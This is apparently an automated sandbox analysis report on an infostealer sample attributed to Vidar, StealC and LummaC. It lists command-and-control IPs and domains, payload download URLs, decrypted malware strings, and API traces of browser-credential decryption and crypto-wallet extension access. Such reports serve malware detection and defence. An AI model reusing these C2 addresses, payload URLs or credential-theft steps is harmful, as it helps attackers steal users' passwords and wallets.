Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CC58EA0 sqlite3_clear_bindings,	3_2_6CC58EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6CD30B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC6410 bind,WSAGetLastError,	29_2_6CAC6410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC60B0 listen,WSAGetLastError,	29_2_6CAC60B0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.8.231.109	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	true
95.164.119.162	stadiatechnologies.com	Gibraltar	39762	VAKPoltavaUkraineUA	true
172.67.146.35	condedqpwqm.shop	United States	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true
147.45.68.138	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true

Contacted Domains

Name	IP	Active
t.me	149.154.167.99	true
condedqpwqm.shop	172.67.146.35	true
stadiatechnologies.com	95.164.119.162	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://147.45.68.138/nss3.dll	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/c4754d4f680ead72.php	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199761128941	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exe	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll	true	Avira URL Cloud: malware	unknown
locatedblsoqp.shop	true	Avira URL Cloud: phishing	unknown
caffegclasiqwp.shop	true	Avira URL Cloud: malware	unknown
millyscroqwp.shop	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/freebl3.dll	true	Avira URL Cloud: malware	unknown
traineiwnqo.shop	true	Avira URL Cloud: malware	unknown
condedqpwqm.shop	true	Avira URL Cloud: phishing	unknown
http://stadiatechnologies.com/	true	Avira URL Cloud: safe	unknown
http://147.45.68.138/	true	Avira URL Cloud: safe	unknown
http://147.45.68.138/sql.dll	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/softokn3.dll	true	Avira URL Cloud: malware	unknown
stagedchheiqwo.shop	true	Avira URL Cloud: phishing	unknown
stamppreewntnq.shop	true	Avira URL Cloud: phishing	unknown
evoliutwoqm.shop	true	Avira URL Cloud: safe	unknown
http://147.45.68.138/msvcp140.dll	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/nss3.dll	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://46.8.231.109/c4754d4f680ead72.php	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpb	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/nss3.dll	Avira URL Cloud: Label: malware
Source: https://t.me/iyigunl	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpnu	Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/api.	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll#	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll_	Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/api45	Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199761128941	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dlli	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/apitK	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpC	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpry=----IDHIIJJJKEGIDGCBAFIJdefaultrelease	Avira URL Cloud: Label: malware
Source: https://t.me/jamelwt#cp	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exe	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlls	Avira URL Cloud: Label: malware
Source: http://46.8.231.109	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.php:#	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpw	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll-	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/freebl3.dll	Avira URL Cloud: Label: malware
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll(	Avira URL Cloud: Label: malware
Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://condedqpwqm.shop/T	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/sql.dll	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/softokn3.dll	Avira URL Cloud: Label: malware
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941", "https://t.me/jamelwt"], "Botnet": "d9949d63cb2f6fce6f80667c0c98ea24"}
Source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php"}
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "caffegclasiqwp.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "stamppreewntnq.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\HDAFIIDAKJ.exe	ReversingLabs: Detection: 32%
Source: C:\Users\userIEHDAFHDHC.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe	ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\HDAFIIDAKJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf818156193_ldjfnsfd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\userFBKFCFBFID.exe	Joe Sandbox ML: detected
Source: C:\Users\userIEHDAFHDHC.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\DHCGHDHIDH.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: caffegclasiqwp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stamppreewntnq.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stagedchheiqwo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: millyscroqwp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: evoliutwoqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: condedqpwqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: traineiwnqo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: locatedblsoqp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: condedqpwqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	3_2_00409BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	3_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	3_2_00407280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00409B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB56C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6CB56C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CCAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6CCAA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00406AB6 CryptUnprotectData,LocalAlloc,LocalFree,	29_2_00406AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040F8D5 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	29_2_0040F8D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00406A53 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	29_2_00406A53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004083FA memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,	29_2_004083FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9C6C80 CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,CertGetNameStringW,CertFreeCRLContext,CryptMsgClose,CertCloseStore,CryptQueryObject,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetLastError,CryptBinaryToStringW,GetLastError,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	29_2_6C9C6C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49740 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb0, source: file.exe
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1963284287.000000003C6D1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.29.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb0 source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1955580137.00000000307F1000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2215879261.000000002232B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb0 source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb source: file.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	3_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	29_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	29_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	29_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	29_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	29_2_00413EA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

29_2_0041391C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	24_2_0040C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_0040B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	24_2_0043BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	24_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	24_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	24_2_00413846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	24_2_0041E850
